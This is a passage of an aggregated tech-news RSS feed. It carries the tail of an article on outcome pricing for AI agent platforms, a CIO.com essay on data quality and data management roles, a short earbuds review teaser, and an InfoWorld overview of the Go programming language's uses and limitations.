<li><strong>The exit. </strong>An embedded agent platform gets stickier than the staffed incumbent it replaced, faster than you would think. Lock down data portability, knowledge-base ownership and a way out while you are still the one with leverage.</li>



<li><strong>Capacity, not just cost. </strong>The best outcome here often isn’t a smaller bill. It is the demand that your old service levels were quietly turning away. Nobody answered the tickets. The cases that aged out. Ask what fixing that is worth before you optimize purely for headcount.</li>
</ol>



<h2 class="wp-block-heading">The move</h2>



<p class="wp-block-paragraph">Outcome pricing is where this lands, and on balance, that is progress. But in the near term, it hands the advantage to whoever can measure the outcome — and in most shops, that isn’t the buyer. The edge isn’t picking the cleverest challenger or the safest incumbent. It is being able to hold any of them to a result, on your numbers. Look again at why Gartner thinks so many of these projects die: Not the technology — cost, fuzzy value, weak controls. Our side of the table. So, start there. Take one high-volume, measurable workflow, pilot it against a baseline you own, instrument it with your own metrics, and treat the muscle you build doing that as the real deliverable. Get it right and the pricing model stops mattering. Skip it, and you have just agreed to pay for someone else’s definition of done.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The essence of data management CIOs must embrace]]></title>
<description><![CDATA[Since the advent of generative AI, the use of AI in business has shifted from something we should do to something we must do to survive. Many companies are now working to utilize AI with the aim of improving productivity and creating value.



Here, I would like to pose a question to you all once...]]></description>
<link>https://tsecurity.de/de/3667389/it-security-nachrichten/the-essence-of-data-management-cios-must-embrace/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667389/it-security-nachrichten/the-essence-of-data-management-cios-must-embrace/</guid>
<pubDate>Tue, 14 Jul 2026 11:08:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Since the advent of generative AI, the use of AI in business has shifted from something we should do to something we must do to survive. Many companies are now working to utilize AI with the aim of improving productivity and creating value.</p>



<p class="wp-block-paragraph">Here, I would like to pose a question to you all once again: “What is the fundamental factor that determines AI performance?”</p>



<p class="wp-block-paragraph">Is it the AI model? Is it the AI tool? Or is it the AI agent?</p>



<p class="wp-block-paragraph">Of course, I believe all of these are important. However, if we look at the long-term perspective, the competition among multiple companies to improve AI model performance will eventually level off, and we will eventually reach a point where every AI model is amazing!</p>



<p class="wp-block-paragraph">In that context, what I believe is the most important factor influencing AI performance is the data accumulated by companies that connects to their unique strengths.</p>



<p class="wp-block-paragraph">For example, if asked, “What do plants need to grow?” I would say “good water and light.”</p>



<p class="wp-block-paragraph">Similarly, if asked, “What do people need to thrive?” I would say, “Kind words.”</p>



<p class="wp-block-paragraph">Finally, “What does AI need to thrive?” The answer is “good data.”</p>



<p class="wp-block-paragraph">I believe that the extent to which companies can genuinely understand the importance of this extremely simple principle and implement it with unwavering dedication will determine their ability to establish a competitive advantage and achieve sustainable growth.</p>



<h2 class="wp-block-heading">AI is a mirror of data</h2>



<p class="wp-block-paragraph">As I’m sure you’re all aware, AI is by no means a magic wand. It is an entity that learns based on the data it is given and makes inferences within that scope. In other words, AI’s output depends heavily on the quality of its input data; one could say that AI is a mirror of data.</p>



<ul class="wp-block-list">
<li>If you feed it inaccurate data, it will return inaccurate results (i.e., garbage in, garbage out)</li>



<li>If you feed it biased data, it will make biased judgments</li>



<li>Insufficient data yields only shallow insights and suggestions</li>
</ul>



<p class="wp-block-paragraph">In this way, AI is not smart but rather faithful to the data. Based on this premise, it becomes clear that the essence of AI utilization lies not in which tools to use, but in what kind of high-quality data to prepare and how to utilize it.</p>



<h2 class="wp-block-heading">What is good data?</h2>



<p class="wp-block-paragraph">So, what exactly is good data?</p>



<p class="wp-block-paragraph">It goes without saying that data is useless if it is merely abundant in quantity, but on the other hand, what specific qualities must good data possess?</p>



<p class="wp-block-paragraph">Generally speaking, good data possesses at least the following elements.</p>



<ul class="wp-block-list">
<li><strong>Accuracy:</strong> Data containing many errors or noise will skew conclusions, no matter how advanced the analysis. It is important to minimize sensor errors, input mistakes and duplicates.</li>



<li><strong>Completeness:</strong> Are any required fields missing, and are there too many missing values? For example, if customer data is missing information such as age, region or gender, it becomes difficult to perform meaningful analysis.</li>



<li><strong>Consistency:</strong> Is data with the same meaning mixed in different formats (e.g., date formats, units, variations in notation)? This is particularly important for system integration and long-term data.</li>



<li><strong>Timeliness:</strong> No matter how accurate it is, data that is too old may not be useful for decision-making. Whether real-time data is required or historical data is sufficient depends on the use case, but it is important that the data has the appropriate freshness for the purpose.</li>



<li><strong>Relevance:</strong> If there is a large amount of data unrelated to the analysis objective, it becomes noise and leads to incorrect judgments. It is necessary to clearly define what the data is used for and ensure the data is appropriate for that purpose.</li>



<li><strong>Reliability: The data’s source and collection method must be</strong> clear, ensuring reliability and reproducibility. Data with an unknown source or that is a black box cannot be verified later.</li>
</ul>



<p class="wp-block-paragraph">In summary, good data is data that is accurate, has few gaps, is consistent in meaning and notation, is collected at the appropriate time, is suitable for the purpose and comes from a reliable source.</p>



<p class="wp-block-paragraph">Only when the quality of this good data is guaranteed can AI produce valuable outputs. Conversely, introducing AI with unorganized data will not yield the expected results. Many complaints, such as “We implemented AI but it’s unusable” or “The AI’s accuracy isn’t improving stem from data issues.”</p>



<h2 class="wp-block-heading">Data does not organize itself naturally</h2>



<p class="wp-block-paragraph">The key point here is that good data does not arise naturally. On the contrary, if left unattended, data will inevitably deteriorate.</p>



<ul class="wp-block-list">
<li>Rules become inconsistent depending on who entered the data and when</li>



<li>Multiple instances of data with the same meaning exist</li>



<li>Outdated data is scattered and left unattended</li>



<li>Data becomes siloed by department</li>
</ul>



<p class="wp-block-paragraph">These conditions are likely common in many companies.</p>



<p class="wp-block-paragraph">Below is an overview of our company’s <a href="https://www.kepco.co.jp/english/corporate/list/report/">data management framework</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/overview-of-data-management-at-kansai-electric-power-company.png?w=1024" alt="Overview of data management at Kansai Electric Power Company" class="wp-image-4196318" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Akio Ueda</p></div>



<p class="wp-block-paragraph">Broadly speaking, it consists of data governance — covering roles and structures, risk management and evaluation — and data management, which encompasses data utilization cycle management and data utilization support services. Within this framework, data utilization cycle management involves:</p>



<ul class="wp-block-list">
<li><strong>Needs management:</strong> We clarify the purpose and needs by asking, “What is the data being used for?” and “For whom, and in what way, does this data create value?”</li>



<li><strong>Collection:</strong> We gather the necessary data based on the defined objectives. We design the process to determine what data is required (internal/external), the level of detail and frequency of collection, and how to ensure data quality.</li>



<li><strong>Processing: </strong>We enhance the quality and prepare the data for use. This includes cleansing (correcting errors and missing values), standardizing formats, deduplicating and integrating data, processing structured and unstructured data separately, and assigning business and operational meaning to the data.</li>



<li><strong>Storage:</strong> We ensure the data is available to the right people at the right time. This involves storing data in databases or data lakes, implementing security and access controls, and managing metadata (ensuring the data is clearly identifiable).</li>



<li><strong>Utilization:</strong> This is the most critical step. The purpose of data is not merely analysis but driving action. We generate value from the data through visualization (dashboards), analysis (statistical processing, BI, AutoML, AI) and integration into business operations (automation and decision support).</li>



<li><strong>Disposal: </strong>We properly dispose of data that is no longer needed. Simply holding data can itself pose risks, such as managing retention periods, complying with laws and governance requirements, and mitigating security risks. That is why the principle of not holding data that is not used is so important.</li>
</ul>



<p class="wp-block-paragraph">Data management is not a one-time effort; it is an ongoing initiative that requires continuous maintenance and improvement.</p>



<p class="wp-block-paragraph">The CIO must embed data management as a system within the organization and continue to implement it until it becomes firmly established.</p>



<h2 class="wp-block-heading">Data management is not just the IT department’s job</h2>



<p class="wp-block-paragraph">Another important point is that data management is not just the IT department’s job.</p>



<p class="wp-block-paragraph">Data is fundamentally generated within day-to-day operations on the front lines. Therefore:</p>



<ul class="wp-block-list">
<li>Who determines the meaning and definition of data</li>



<li>How should input rules be standardized?</li>



<li>How do we ensure data quality?</li>
</ul>



<p class="wp-block-paragraph">are, in essence, operational issues, business issues and management issues.</p>



<p class="wp-block-paragraph">The latest Digital Skills Standard ver. 2.0, published by the Ministry of Economy, Trade and Industry in April 2026, defines the following three roles within the data management category:</p>



<ul class="wp-block-list">
<li><strong>Data steward:</strong> Based on business domain knowledge, this role is responsible for operations aimed at ensuring data quality, reliability and security, as well as for promoting the adoption and establishment of data management within business divisions and frontline organizations, and for fostering data utilization. In short, they are the data quality manager and data utilization promoter.</li>



<li><strong>Data engineer: </strong>This role involves understanding the current state of data and supporting the organization’s continuous data utilization through data preparation and preprocessing in processes such as collection, integration, processing and provision, as well as the design and implementation of data pipelines. In essence, they are the implementers and operators who drive data.</li>



<li><strong>Data architect:</strong> This role involves taking a bird’s-eye view of the data structure, flow and utilization methods across the entire organization and business. By designing and continuously reviewing data architecture that encompasses the entire data lifecycle in alignment with business strategy, they ensure the successful integration of company-wide data utilization and governance—essentially serving as the overall designer of data.</li>
</ul>



<p class="wp-block-paragraph">The CIO is not merely responsible for establishing data storage and analysis infrastructure; they are also tasked with appropriately assigning personnel to these three roles within the company and establishing cross-departmental, company-wide tools and rules to connect data with management, business operations and daily tasks.</p>



<h2 class="wp-block-heading">Ultimately, the success of data utilization depends on organizational culture</h2>



<p class="wp-block-paragraph">On the other hand, no matter how much progress is made in staffing, infrastructure, tools and rulemaking, data will not be utilized unless there is an organizational culture that actively drives management, business and operations based on data.</p>



<ul class="wp-block-list">
<li>The purpose of data entry is not understood</li>



<li>Data is optimized solely for the department’s own operations</li>



<li>Decision-making based on data is not valued</li>
</ul>



<p class="wp-block-paragraph">In such a situation, no matter how well the systems are set up, they will become mere formalities.</p>



<p class="wp-block-paragraph">In contrast, in organizations where data utilization is advanced:</p>



<ul class="wp-block-list">
<li>Discussions are based on data</li>



<li>Formulate hypotheses and verify them with data</li>



<li>And continuously improve based on data</li>
</ul>



<p class="wp-block-paragraph">These actions occur naturally.</p>



<p class="wp-block-paragraph">In other words, the essence of data management ultimately lies in creating an organizational culture that assumes the effective use of data.</p>



<p class="wp-block-paragraph">Data management cannot be achieved overnight. That is precisely why it is important to start small and build on your successes.</p>



<ul class="wp-block-list">
<li>Organize data for specific tasks and achieve results through the use of AI</li>



<li>Rolling out successful practices</li>



<li>Gradually Expand the Scope</li>
</ul>



<p class="wp-block-paragraph">By repeating this cycle, the importance of data will permeate the entire organization.</p>



<h2 class="wp-block-heading">The role expected of a CIO in the AI era</h2>



<p class="wp-block-paragraph">In the AI era, the role expected of a CIO has changed significantly.</p>



<p class="wp-block-paragraph">Traditionally:</p>



<ul class="wp-block-list">
<li>Ensuring the stable operation of systems</li>



<li>And optimizing costs</li>
</ul>



<p class="wp-block-paragraph">However, moving forward:</p>



<ul class="wp-block-list">
<li>We will view data as an asset and maximize its value</li>



<li>Developing the data infrastructure, tools and rules that underpin AI adoption, and advancing personnel allocation and development</li>



<li>And fostering an organizational culture that embraces data utilization —roles that are more directly linked to business management</li>
</ul>



<p class="wp-block-paragraph">In other words, the CIO must evolve into the person responsible for creating value from data.</p>



<h2 class="wp-block-heading">Data is the source of competitive advantage</h2>



<p class="wp-block-paragraph">In the coming era, the use of AI will be a given. What will set companies apart is not whether they use AI, but what data they possess.</p>



<p class="wp-block-paragraph">Data is the accumulation of a company’s past strengths and the source of future value creation. And its quality is determined by daily operations and the nature of the organization.</p>



<ul class="wp-block-list">
<li>AI grows by being fed good data</li>



<li>And companies grow through that AI</li>
</ul>



<p class="wp-block-paragraph">Taking this simple principle as our starting point, we must place data management at the core of our business strategy. Isn’t that the shortest route to sustainable growth in the AI era?</p>



<p class="wp-block-paragraph">CIOs are called upon to lead the way in making this a reality.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Open earbuds let you tune in without tuning out the world. Here are the five best pairs]]></title>
<description><![CDATA[Don’t float through the world in an AirPod bubble – enjoy music or podcasts and carry on using these tested favoritesI tested 42 pairs of wireless earbuds to find the best in USSign up for the Filter US newsletter, your weekly guide to buying fewer, better thingsIn a feat of engineering that bord...]]></description>
<link>https://tsecurity.de/de/3666263/it-nachrichten/open-earbuds-let-you-tune-in-without-tuning-out-the-world-here-are-the-five-best-pairs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3666263/it-nachrichten/open-earbuds-let-you-tune-in-without-tuning-out-the-world-here-are-the-five-best-pairs/</guid>
<pubDate>Mon, 13 Jul 2026 21:32:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Don’t float through the world in an AirPod bubble – enjoy music or podcasts and carry on using these tested favorites</p><ul><li><p><a href="https://www.theguardian.com/thefilter-us/2026/apr/24/best-wireless-earbuds">I tested 42 pairs of wireless earbuds to find the best in US</a></p></li><li><p><a href="https://www.theguardian.com/global/2025/sep/09/sign-up-to-the-filter-us-our-newsletter-guide-to-buying-fewer-better-products">Sign up for the Filter US newsletter, your weekly guide to buying fewer, better things</a></p></li></ul><p>In a feat of engineering that borders on magic, the <a href="https://www.theguardian.com/thefilter-us/2026/apr/24/best-wireless-earbuds">best wireless earbuds</a> can silence the noisy world around you at the tap of a finger. So, why would you buy open earbuds, which are specifically designed to let <em>in</em> environmental sounds?</p><p>Frankly, I didn’t understand the appeal of them either until I started testing them, and now I use open earbuds even more than my noise-cancelling earbuds. For situations from <a href="https://www.theguardian.com/thefilter-us/2026/jul/04/best-hiking-daypacks-tested-reviewed">hiking</a> to running errands, these are the headphones you should be wearing. Here’s what you’re missing out on, and a few of the best pairs to try.</p><p><strong>Best overall open-ear earbuds:</strong> <br>
 Soundcore Aeroclip Open-Ear Earbuds</p><p><strong>Best premium open-ear earbuds:</strong><br>
 Bose Ultra Open Earbuds</p> <a href="https://www.theguardian.com/thefilter-us/2026/jul/13/best-open-ear-earbuds">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s the Go language really good for?]]></title>
<description><![CDATA[Over its more than 15 years in the wild, Google’s Go programming language has evolved from a curiosity for alpha geeks to the battle-tested programming language behind some of the world’s most important cloud-native software projects.



If you’ve ever wondered why Go is the language of choice fo...]]></description>
<link>https://tsecurity.de/de/3665677/ai-nachrichten/whats-the-go-language-really-good-for/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665677/ai-nachrichten/whats-the-go-language-really-good-for/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:43 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over its more than 15 years in the wild, Google’s <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">Go programming language</a> has evolved from a curiosity for alpha geeks to the battle-tested programming language behind some of the world’s most important <a href="https://www.infoworld.com/article/2255318/what-is-cloud-native-the-modern-way-to-develop-software.html">cloud-native</a> software projects.</p>



<p class="wp-block-paragraph">If you’ve ever wondered why Go is the language of choice for projects like <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a> and <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, this article is for you. We’ll discuss Go’s defining characteristics and how it differs from other programming languages. You will also learn what kinds of projects Go is best suited for, including the state of <a href="https://www.infoworld.com/article/2338115/what-is-generative-ai-artificial-intelligence-that-creates.html">Go development for AI-powered tools</a>. We’ll conclude with an overview of Go’s feature set, some limitations of the language, and where it may be going from here.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">Golang tutorial: Get started with the Go language</a>.</strong></p>



<h2 class="wp-block-heading">Go is small and simple</h2>



<p class="wp-block-paragraph">Go, or <a href="https://go.dev/doc/faq#go_or_golang">Golang</a> as it’s often called, was created by Google employees—chiefly longtime Unix guru and Google distinguished engineer Rob Pike—but it’s not strictly speaking a “Google project.” Rather, Go is a community-developed <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a> project, spearheaded by leadership with strong opinions about how Go should be used and the direction the language should take.</p>



<p class="wp-block-paragraph">Go is meant to be easy to learn and straightforward to use, with syntax that is simple to read and understand. Go does not have a large feature set, especially when compared to languages like <a href="https://www.infoworld.com/article/2338049/c-23-language-standard-declared-feature-complete.html">C++</a>. Go’s syntax is reminiscent of <a href="https://www.infoworld.com/article/2261151/why-the-c-programming-language-still-rules.html">C</a>, making it relatively easy for longtime C developers to learn. That said, many features of Go, especially its <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">concurrency and functional programming features</a>, harken back to languages like Erlang.</p>



<p class="wp-block-paragraph">As a C-like language for building and maintaining cross-platform enterprise applications of all sorts, <a href="https://www.infoworld.com/article/2514123/8-reasons-developers-love-go-and-8-reasons-they-dont.html">Go has much in common with Java</a>. And as a means for enabling rapid development of code that might run anywhere, you could draw a parallel between Go and <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, though the differences outweigh the similarities.</p>



<p class="wp-block-paragraph">The <a href="https://go.dev/doc">Go documentation</a> describes Go as “a fast, statically typed, compiled language that feels like a dynamically typed, interpreted language.” Even a large Go program will compile in a matter of seconds. Plus, Go avoids much of the overhead of C-style include files and libraries.</p>



<h2 class="wp-block-heading">Advantages of the Go language</h2>



<p class="wp-block-paragraph">Go is a versatile, convenient, fast, portable, interoperable, and widely supported modern language. These characteristics have helped to make it a top choice for large-scale development projects. Let’s look more closely at each of these positive qualities of Go.</p>



<h3 class="wp-block-heading">Go is versatile and convenient</h3>



<p class="wp-block-paragraph">Go has been compared to interpreted languages like <a href="https://www.infoworld.com/article/2254260/how-to-get-started-with-python.html">Python</a> in its ability to satisfy many common programming needs. Some of this functionality is built into the language itself, such as goroutines for concurrency and thread-like behavior, while additional capabilities are available in Go standard library packages, like the <a href="https://golang.org/pkg/net/http/">http package</a>. Like Python, Go provides automatic memory management capabilities including <a href="https://www.infoworld.com/article/2337816/what-is-garbage-collection-automated-memory-management-for-your-programs.html">garbage collection</a>.</p>



<p class="wp-block-paragraph">Unlike interpreted languages, however, Go code compiles to a fast-running native binary. And unlike C or C++, Go compiles extremely fast—fast enough to make working with Go feel more like working with an interpreted language than a compiled one. Further, the Go build system is less complex than those of other compiled languages. It takes few steps and little bookkeeping to build and run a Go project.</p>



<h3 class="wp-block-heading">Go is faster than many other languages</h3>



<p class="wp-block-paragraph">Go binaries run more slowly than their C counterparts, but the difference in speed is negligible for most applications. Go performance is as good as C for the vast majority of work, and generally much faster than other languages known for speed of development—including <a href="https://www.infoworld.com/article/2263137/what-is-javascript-the-full-stack-programming-language.html">JavaScript</a>, <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">Python</a>, and <a href="https://www.infoworld.com/article/2337962/whatever-happened-to-ruby.html">Ruby</a>.</p>



<h3 class="wp-block-heading">Go is portable and interoperable</h3>



<p class="wp-block-paragraph">Executables created with the Go toolchain can stand alone, with no default external dependencies. The Go toolchain is available for a wide variety of operating systems and hardware platforms, and can be used to compile binaries across platforms. What’s more, Go delivers all of the above without sacrificing access to the underlying system. Go programs can talk to external C libraries or make native system calls. In <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker</a>, for instance, Go interacts with low-level Linux functions, cgroups, and namespaces to work container magic.</p>



<h3 class="wp-block-heading">Go is widely supported</h3>



<p class="wp-block-paragraph">The Go toolchain is freely available as a Linux, macOS, or Windows binary, or as a Docker container. Go is included by default in many popular Linux distributions, such as Red Hat Enterprise Linux and Fedora, making it somewhat easier to deploy Go source to those platforms. Support for Go is also strong across many third-party development environments, from Microsoft’s <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> to ActiveState’s <a href="https://www.infoworld.com/article/2250631/review-7-python-ides-compared.html">Komodo IDE</a>.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/2514123/8-reasons-developers-love-go-and-8-reasons-they-dont.html">8 reasons developers love Go—and 8 reasons they don’t</a>.</strong></p>



<h2 class="wp-block-heading">Optimal use cases for the Go language</h2>



<p class="wp-block-paragraph">No language is suited to every job, but some languages are suited to more jobs than others. Go shines brightest in cloud-native development projects, distributed network services, and for developing utilities and stand-alone tools. Let’s consider the qualities that make Go especially well-suited to each of these project types.</p>



<h3 class="wp-block-heading">Cloud-native development</h3>



<p class="wp-block-paragraph">Go’s concurrency and networking features, and its high degree of portability, make it well-suited for building cloud-native apps. In fact, Go was used to build several cornerstones of cloud-native computing including <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a>, <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-your-next-application-platform.html">Kubernetes</a>, and <a href="https://www.infoworld.com/article/2258313/what-is-istio-the-kubernetes-service-mesh-explained.html">Istio</a>.</p>



<h3 class="wp-block-heading">Distributed network services</h3>



<p class="wp-block-paragraph">Network applications live and die by concurrency, and Go’s native concurrency features—<a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">goroutines</a> and <a href="https://www.infoworld.com/article/2255834/go-tutorial-get-started-with-google-go.html">channels</a>, mainly—are well suited for such work. Consequently, many Go projects are for networking, distributed functions, and cloud services. These include <a href="https://github.com/go-goyave/goyave">APIs</a>, <a href="https://github.com/mholt/caddy">web servers</a>, <a href="https://github.com/claygod/microservice">Kubernetes-ready frameworks for microservices</a>, and much more.</p>



<h3 class="wp-block-heading">Utilities and standalone tools</h3>



<p class="wp-block-paragraph">Go programs compile to binaries with minimal external dependencies. That makes them ideally suited to creating utilities and other tools, because they launch quickly and can be readily packaged up for redistribution. One example is an <a href="https://goteleport.com/">access server called Teleport</a>, which can be deployed on servers quickly by compiling it from source or downloading a prebuilt binary.</p>



<h2 class="wp-block-heading">Limitations of the Go language</h2>



<p class="wp-block-paragraph">Now let’s consider some of the limitations of Go. For one, it omits many language features developers may desire. It also packs everything into its binaries, so Go programs can be large. Furthermore, <a href="https://www.infoworld.com/article/4041753/go-language-previews-performance-boosting-garbage-collector.html">Go’s garbage collection mechanism</a> delivers automatic memory management at the cost of absolute performance. The language also lacks a standard toolkit for building GUIs, and it is unsuited to systems programming.</p>



<p class="wp-block-paragraph">Let’s look at each of these issues in detail.</p>



<h3 class="wp-block-heading">Go omits many desirable language features</h3>



<p class="wp-block-paragraph">Go’s opinionated set of features draws both praise and criticism. Go is designed to err on the side of being small and easy to understand, with certain features deliberately omitted. The result is that some features that are commonplace in other languages simply aren’t available in Go. This is purposeful, but it’s still a drawback for some types of projects.</p>



<p class="wp-block-paragraph">One thing Go omits that you will find in other languages is <em>macros</em>, commonly defined as the ability to generate program code at compile time. C, C++, and (the rising star) <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a> all have macro systems. Go does not have macros, or at least not of the same variety as those languages. What Go does have is a tool command, <code>go generate</code>, which looks for magic comments in Go source and executes them. This can be used to generate Go source code, or even run other commands, but its main use is to programmatically generate code, usually as a precursor to the build process. (Technical blogger Eli Bendersky <a href="https://eli.thegreenplace.net/2021/a-comprehensive-guide-to-go-generate/">explains the ‘go generate’ command in detail</a>.)</p>



<p class="wp-block-paragraph">Another longstanding complaint with Go was, until recently, the lack of generic functions, which allow a function to accept many different types of variables. Go’s development team held out against adding generics to the language for many years because they wanted a syntax and set of behaviors that complemented the rest of Go. But as of <a href="https://tip.golang.org/doc/go1.18">Go 1.18</a>, released in early 2022, the language <a href="https://www.infoworld.com/article/2271612/get-started-with-generics-in-go.html">includes a syntax for generics</a>. Because <code>go generate</code> and its code-generation abilities emerged as one possible way to partially address the lack of generics, this functionality is no longer as commonly used in Go.</p>



<p class="wp-block-paragraph">The fact is that Go adds major language features rarely, and only after much consideration. This works to preserve broad compatibility across versions, but it comes at the cost of slower innovation.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3849417/what-you-need-to-know-about-go-rust-and-zig.html">What you need to know about Go, Rust, and Zig</a>.</strong></p>



<h3 class="wp-block-heading">Go’s binaries are large</h3>



<p class="wp-block-paragraph">Another potential downside to Go is the size of the generated binaries. Go binaries are statically compiled by default, meaning that everything needed at runtime is included in the binary image. This approach simplifies the build and deployment process, but at the cost of a simple “Hello, world!” weighing in at around 1.5MB on 64-bit Windows. The Go team has been <a href="https://blog.golang.org/go1.7-binary-size">working to reduce the size of those binaries</a> with each successive release. It is also possible to <a href="https://blog.filippo.io/shrink-your-go-binaries-with-this-one-weird-trick/">shrink Go binaries with compression</a> or by <a href="https://jamescun.com/golang/binary-size/">removing Go’s debug information</a>. This last option may work better for standalone distributed apps than for cloud or network services, where having debug information is useful if a service fails in place.</p>



<h3 class="wp-block-heading">Go’s garbage collection is resource hungry</h3>



<p class="wp-block-paragraph">Yet another touted feature of Go, automatic memory management, can be seen as a drawback, as garbage collection requires a certain amount of processing overhead. By design, Go <a href="https://golang.org/doc/faq#garbage_collection">doesn’t provide manual memory management</a>, and garbage collection in Go has been criticized for not dealing well with the kinds of memory loads that appear in enterprise applications.</p>



<p class="wp-block-paragraph">That said, each new version of Go seems to improve the memory management features. For example, Go 1.8 brought <a href="https://golang.org/doc/go1.8#gc">significantly shorter lag times for garbage collection</a>, and <a href="https://www.infoworld.com/article/4041753/go-language-previews-performance-boosting-garbage-collector.html">Go 1.25</a> introduced a new, experimental garbage collector. While Go developers can use manual memory allocation in a C extension, or by way of a <a href="https://github.com/joetifa2003/mm-go">third-party manual memory management library</a>, most prefer native solutions.</p>



<h3 class="wp-block-heading">Go doesn’t have a standard GUI toolkit</h3>



<p class="wp-block-paragraph">Most Go applications are command-line tools or network services. That said, various projects are working to bring rich GUIs for Go applications. There are bindings for the <a href="https://mattn.github.io/go-gtk/">GTK</a> and <a href="https://github.com/gotk3/gotk3">GTK3</a> frameworks. Another project is intended to provide <a href="https://github.com/richardwilkes/unison">platform-native UIs</a> across platforms, although it focuses on Go 1.24 forward only. But no clear winner or safe long-term bet has emerged in this space. Also, because Go is platform-independent by design, it is unlikely any project in this vein will become a part of the standard package set.</p>



<h3 class="wp-block-heading">You shouldn’t use Go for systems programming</h3>



<p class="wp-block-paragraph">Finally, although Go can talk to native system functions, it was not designed for developing low-level system components such as kernels, device drivers, or embedded systems. After all, the Go runtime and the garbage collector for Go applications are dependent on the underlying operating system. (Developers interested in a cutting-edge language for that kind of work might look into using <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">Rust</a>.)</p>



<h2 class="wp-block-heading">The future of the Go language</h2>



<p class="wp-block-paragraph">Go’s development is turning more toward the wants and needs of its developer base, with Go’s minders changing the language to better accommodate this audience rather than leading by stubborn example. A case in point is generics, which were finally added to the language after much deliberation about the best way to do so.</p>



<p class="wp-block-paragraph">The <a href="https://www.infoworld.com/article/2336812/go-language-shines-for-ai-powered-workloads-survey-says.html">2024 Go Developer Survey</a> found developers were overall satisfied with Go. Challenges that surfaced were generally due to the verbosity of error handling, missing or immature frameworks, and using Go’s type system—areas ripe for future development.</p>



<p class="wp-block-paragraph">Like most languages, Go has gravitated to a core set of use cases over time, finding its niche in network services. In the future, Go is likely to continue expanding its hold there. Other use cases cited in the developer survey include creating APIs or RPC services (74% of respondents), followed by CLI applications (63%), web services (45%), libraries/frameworks (44%), automation (39%), and data processing (37%). While only 4% of respondents mentioned using Go to develop <a href="https://www.infoworld.com/artificial-intelligence/">AI technologies</a>, those who did reported that <a href="https://www.infoworld.com/article/2336812/go-language-shines-for-ai-powered-workloads-survey-says.html">Go was a strong platform for running AI-powered workloads in production</a>. For those wanting to develop ML/AI with Go, lack of tooling (23%) and the fact that Python is the default choice for such work (16%) topped the reasons why.</p>



<p class="wp-block-paragraph">It remains to be seen how far Go’s speed and development simplicity will take it into other use cases, especially those dominated by other languages and their existing use cases. Rust covers <a href="https://www.infoworld.com/article/2255250/what-is-rust-safe-fast-and-easy-software-development.html">safe and fast systems programming</a> (a space Go is unlikely to enter); Python is still a common default for <a href="https://www.infoworld.com/article/2253770/what-is-python-powerful-intuitive-programming.html">ML/AI, prototyping, automation, and glue code</a>; and Java remains a stalwart for <a href="https://www.infoworld.com/java">enterprise applications</a>.</p>



<p class="wp-block-paragraph">But Go’s future as a major programming language is already assured—certainly in the cloud, where the speed and simplicity of Go ease the development of scalable infrastructure that can be maintained over the long run.</p>



<p class="wp-block-paragraph"><strong>Also see: <a href="https://www.infoworld.com/article/3607388/go-language-evolving-for-future-hardware-ai-workloads.html">Go language evolving for future hardware, AI workloads</a>.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[React tutorial: Get started with the React JavaScript library]]></title>
<description><![CDATA[Despite many worthy contenders, React remains the most popular front-end framework, and a key player in the JavaScript development landscape. React is the quintessential reactive engine, continually innovating alongside the rest of the industry. A flagship open source project at Facebook, React i...]]></description>
